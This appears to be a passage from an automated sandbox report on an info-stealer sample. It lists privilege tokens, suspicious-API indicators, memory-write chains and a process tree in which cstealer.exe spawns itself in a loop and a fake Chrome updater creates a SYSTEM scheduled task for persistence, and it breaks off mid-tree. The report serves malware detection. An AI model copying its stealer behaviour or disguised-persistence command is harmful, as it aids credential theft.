Token: SeSecurityPrivilege	6016	WMIC.exe
Token: SeTakeOwnershipPrivilege	6016	WMIC.exe
Token: SeLoadDriverPrivilege	6016	WMIC.exe
Token: SeSystemProfilePrivilege	6016	WMIC.exe
Token: SeSystemtimePrivilege	6016	WMIC.exe
Token: SeProfSingleProcessPrivilege	6016	WMIC.exe
Token: SeIncBasePriorityPrivilege	6016	WMIC.exe
Token: SeCreatePagefilePrivilege	6016	WMIC.exe
Token: SeBackupPrivilege	6016	WMIC.exe
Token: SeRestorePrivilege	6016	WMIC.exe
Token: SeShutdownPrivilege	6016	WMIC.exe
Token: SeDebugPrivilege	6016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6016	WMIC.exe
Token: SeRemoteShutdownPrivilege	6016	WMIC.exe
Token: SeUndockPrivilege	6016	WMIC.exe
Token: SeManageVolumePrivilege	6016	WMIC.exe
Token: 33	6016	WMIC.exe
Token: 34	6016	WMIC.exe
Token: 35	6016	WMIC.exe
Token: 36	6016	WMIC.exe
Token: SeDebugPrivilege	6048	tasklist.exe
Token: SeDebugPrivilege	5820	powershell.exe
Token: SeDebugPrivilege	3232	powershell.exe
Token: SeIncreaseQuotaPrivilege	6016	WMIC.exe
Token: SeSecurityPrivilege	6016	WMIC.exe
Token: SeTakeOwnershipPrivilege	6016	WMIC.exe
Token: SeLoadDriverPrivilege	6016	WMIC.exe
Token: SeSystemProfilePrivilege	6016	WMIC.exe
Token: SeSystemtimePrivilege	6016	WMIC.exe
Token: SeProfSingleProcessPrivilege	6016	WMIC.exe
Token: SeIncBasePriorityPrivilege	6016	WMIC.exe
Token: SeCreatePagefilePrivilege	6016	WMIC.exe
Token: SeBackupPrivilege	6016	WMIC.exe
Token: SeRestorePrivilege	6016	WMIC.exe
Token: SeShutdownPrivilege	6016	WMIC.exe
Token: SeDebugPrivilege	6016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6016	WMIC.exe
Token: SeRemoteShutdownPrivilege	6016	WMIC.exe
Token: SeUndockPrivilege	6016	WMIC.exe
Token: SeManageVolumePrivilege	6016	WMIC.exe
Token: 33	6016	WMIC.exe
Token: 34	6016	WMIC.exe
Token: 35	6016	WMIC.exe
Token: 36	6016	WMIC.exe
Token: SeDebugPrivilege	8780	powershell.exe
Token: SeDebugPrivilege	9028	powershell.exe
Token: SeDebugPrivilege	5184	tasklist.exe
Token: SeIncreaseQuotaPrivilege	6520	WMIC.exe
Token: SeSecurityPrivilege	6520	WMIC.exe
Token: SeTakeOwnershipPrivilege	6520	WMIC.exe
Token: SeLoadDriverPrivilege	6520	WMIC.exe
Token: SeSystemProfilePrivilege	6520	WMIC.exe
Token: SeSystemtimePrivilege	6520	WMIC.exe
Token: SeProfSingleProcessPrivilege	6520	WMIC.exe
Token: SeIncBasePriorityPrivilege	6520	WMIC.exe
Token: SeCreatePagefilePrivilege	6520	WMIC.exe
Token: SeBackupPrivilege	6520	WMIC.exe

Suspicious use of FindShellTrayWindow 16 IoCs

Processes:

Explorer.EXE

pid	process
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE
3556	Explorer.EXE

Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Explorer.EXE

pid process

3556 Explorer.EXE
3556 Explorer.EXE
3556 Explorer.EXE
3556 Explorer.EXE

Suspicious use of SetWindowsHookEx 26 IoCs

Processes:

Update.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exe

pid	process
7468	Update.exe
9468	Conhost.exe
8848	Conhost.exe
8368	Conhost.exe
7960	Conhost.exe
6188	Conhost.exe
9444	Conhost.exe
5680	Conhost.exe
10096	Conhost.exe
9356	Conhost.exe
9092	Conhost.exe
6180	Conhost.exe
2568	Conhost.exe
9428	Conhost.exe
8196	Conhost.exe
10532	Conhost.exe
10932	Conhost.exe
10472	Conhost.exe
11516	Conhost.exe
11768	Conhost.exe
11536	Conhost.exe
11668	Conhost.exe
11292	Conhost.exe
12116	Conhost.exe
11756	Conhost.exe
12968	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581.execstealer.execstealer.execmd.execstealer.execstealer.execmd.execstealer.execstealer.execmd.execstealer.execstealer.execmd.execstealer.exemain.execstealer.exemain.execmd.execstealer.execstealer.execmd.execmd.execstealer.execstealer.execmd.execstealer.exeBuild.execstealer.execmd.execstealer.exe

description	pid	process	target process
PID 1804 wrote to memory of 3548	1804	6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581.exe	cstealer.exe
PID 1804 wrote to memory of 3548	1804	6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581.exe	cstealer.exe
PID 3548 wrote to memory of 2256	3548	cstealer.exe	cstealer.exe
PID 3548 wrote to memory of 2256	3548	cstealer.exe	cstealer.exe
PID 2256 wrote to memory of 2280	2256	cstealer.exe	cmd.exe
PID 2256 wrote to memory of 2280	2256	cstealer.exe	cmd.exe
PID 2280 wrote to memory of 4600	2280	cmd.exe	cstealer.exe
PID 2280 wrote to memory of 4600	2280	cmd.exe	cstealer.exe
PID 4600 wrote to memory of 2404	4600	cstealer.exe	cstealer.exe
PID 4600 wrote to memory of 2404	4600	cstealer.exe	cstealer.exe
PID 2404 wrote to memory of 3568	2404	cstealer.exe	cmd.exe
PID 2404 wrote to memory of 3568	2404	cstealer.exe	cmd.exe
PID 3568 wrote to memory of 4156	3568	cmd.exe	cstealer.exe
PID 3568 wrote to memory of 4156	3568	cmd.exe	cstealer.exe
PID 4156 wrote to memory of 372	4156	cstealer.exe	cstealer.exe
PID 4156 wrote to memory of 372	4156	cstealer.exe	cstealer.exe
PID 372 wrote to memory of 1248	372	cstealer.exe	cmd.exe
PID 372 wrote to memory of 1248	372	cstealer.exe	cmd.exe
PID 1248 wrote to memory of 4720	1248	cmd.exe	cstealer.exe
PID 1248 wrote to memory of 4720	1248	cmd.exe	cstealer.exe
PID 4720 wrote to memory of 1304	4720	cstealer.exe	cstealer.exe
PID 4720 wrote to memory of 1304	4720	cstealer.exe	cstealer.exe
PID 1304 wrote to memory of 1520	1304	cstealer.exe	cmd.exe
PID 1304 wrote to memory of 1520	1304	cstealer.exe	cmd.exe
PID 1520 wrote to memory of 1240	1520	cmd.exe	cstealer.exe
PID 1520 wrote to memory of 1240	1520	cmd.exe	cstealer.exe
PID 1240 wrote to memory of 5032	1240	cstealer.exe	cstealer.exe
PID 1240 wrote to memory of 5032	1240	cstealer.exe	cstealer.exe
PID 1804 wrote to memory of 4852	1804	6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581.exe	main.exe
PID 1804 wrote to memory of 4852	1804	6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581.exe	main.exe
PID 4852 wrote to memory of 3712	4852	main.exe	main.exe
PID 4852 wrote to memory of 3712	4852	main.exe	main.exe
PID 5032 wrote to memory of 4152	5032	cstealer.exe	cmd.exe
PID 5032 wrote to memory of 4152	5032	cstealer.exe	cmd.exe
PID 3712 wrote to memory of 4444	3712	main.exe	cmd.exe
PID 3712 wrote to memory of 4444	3712	main.exe	cmd.exe
PID 4152 wrote to memory of 740	4152	cmd.exe	cstealer.exe
PID 4152 wrote to memory of 740	4152	cmd.exe	cstealer.exe
PID 740 wrote to memory of 3640	740	cstealer.exe	cstealer.exe
PID 740 wrote to memory of 3640	740	cstealer.exe	cstealer.exe
PID 3640 wrote to memory of 2760	3640	cstealer.exe	cmd.exe
PID 3640 wrote to memory of 2760	3640	cstealer.exe	cmd.exe
PID 4444 wrote to memory of 4552	4444	cmd.exe	Build.exe
PID 4444 wrote to memory of 4552	4444	cmd.exe	Build.exe
PID 4444 wrote to memory of 4552	4444	cmd.exe	Build.exe
PID 2760 wrote to memory of 3424	2760	cmd.exe	cstealer.exe
PID 2760 wrote to memory of 3424	2760	cmd.exe	cstealer.exe
PID 3424 wrote to memory of 1620	3424	cstealer.exe	cstealer.exe
PID 3424 wrote to memory of 1620	3424	cstealer.exe	cstealer.exe
PID 1620 wrote to memory of 4780	1620	cstealer.exe	cmd.exe
PID 1620 wrote to memory of 4780	1620	cstealer.exe	cmd.exe
PID 4780 wrote to memory of 1716	4780	cmd.exe	cstealer.exe
PID 4780 wrote to memory of 1716	4780	cmd.exe	cstealer.exe
PID 1716 wrote to memory of 3284	1716	cstealer.exe	cstealer.exe
PID 1716 wrote to memory of 3284	1716	cstealer.exe	cstealer.exe
PID 4552 wrote to memory of 4232	4552	Build.exe	hacn.exe
PID 4552 wrote to memory of 4232	4552	Build.exe	hacn.exe
PID 3284 wrote to memory of 2876	3284	cstealer.exe	cmd.exe
PID 3284 wrote to memory of 2876	3284	cstealer.exe	cmd.exe
PID 2876 wrote to memory of 3964	2876	cmd.exe	cstealer.exe
PID 2876 wrote to memory of 3964	2876	cmd.exe	cstealer.exe
PID 4552 wrote to memory of 2676	4552	Build.exe	based.exe
PID 4552 wrote to memory of 2676	4552	Build.exe	based.exe
PID 3964 wrote to memory of 1456	3964	cstealer.exe	cstealer.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:620
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1020
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 1020 -s 3080
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:11960
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  PID:10728

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1096
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2900
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of SetThreadContext
  PID:7864
- - C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
    3⤵
    - Creates scheduled task(s)
    PID:11480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1128

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1400
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1668

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1892

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2176

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2272

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2828

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2888

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2952

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3452

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3556
- C:\Users\Admin\AppData\Local\Temp\6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581.exe
  "C:\Users\Admin\AppData\Local\Temp\6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1804
- - C:\Users\Admin\AppData\Local\Temp\cstealer.exe
    "C:\Users\Admin\AppData\Local\Temp\cstealer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3548
  - - C:\Users\Admin\AppData\Local\Temp\cstealer.exe
      "C:\Users\Admin\AppData\Local\Temp\cstealer.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2256
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2280
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2524
      - C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3568
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        11⤵
        Suspicious use of WriteProcessMemory
        
        PID:1248
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:3852
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        12⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        14⤵
        Suspicious use of WriteProcessMemory
        
        PID:1520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        15⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1240
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        16⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        17⤵
        Suspicious use of WriteProcessMemory
        
        PID:4152
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        18⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:740
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        19⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        20⤵
        Suspicious use of WriteProcessMemory
        
        PID:2760
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        21⤵
        
        PID:1084
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        21⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        22⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        23⤵
        Suspicious use of WriteProcessMemory
        
        PID:4780
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        24⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        25⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        26⤵
        Suspicious use of WriteProcessMemory
        
        PID:2876
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        27⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        28⤵
        Executes dropped EXE
        
        PID:1456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        29⤵
        
        PID:4884
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        30⤵
        Executes dropped EXE
        
        PID:4184
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        31⤵
        Executes dropped EXE
        
        PID:5024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        32⤵
        
        PID:4204
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:4368
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        33⤵
        Executes dropped EXE
        
        PID:3344
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        34⤵
        Executes dropped EXE
        
        PID:2324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        35⤵
        
        PID:412
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        36⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        36⤵
        Executes dropped EXE
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        37⤵
        Executes dropped EXE
        
        PID:1348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        38⤵
        
        PID:5136
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        39⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        39⤵
        Executes dropped EXE
        
        PID:7264
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        40⤵
        Executes dropped EXE
        
        PID:7420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        41⤵
        
        PID:7608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        42⤵
        
        PID:7616
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        42⤵
        Executes dropped EXE
        
        PID:7712
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        43⤵
        Executes dropped EXE
        
        PID:7888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        44⤵
        
        PID:5860
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        45⤵
        Executes dropped EXE
        
        PID:6828
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        46⤵
        Executes dropped EXE
        
        PID:8228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        47⤵
        
        PID:8244
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        48⤵
        
        PID:8252
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        48⤵
        Executes dropped EXE
        
        PID:8300
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        49⤵
        Executes dropped EXE
        
        PID:8408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        50⤵
        
        PID:8588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        51⤵
        
        PID:8580
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
